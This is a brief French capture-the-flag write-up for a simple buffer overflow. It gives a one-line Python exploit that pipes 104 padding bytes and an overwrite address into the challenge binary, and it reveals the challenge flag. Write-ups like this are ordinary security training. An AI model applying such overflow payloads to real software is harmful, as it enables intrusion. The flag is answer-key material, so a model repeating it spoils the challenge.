Writeup
=======

Exploitation d'un buffer overflow simple.

Exploitation&nbsp;:

``bash
python2.7 -c 'print("A"*104+"\x88\xd9\xca\xb9")' | ./chall
``

Flag&nbsp;: `ENSIBS{Xor_and_Pwn_you_are_mastering}`
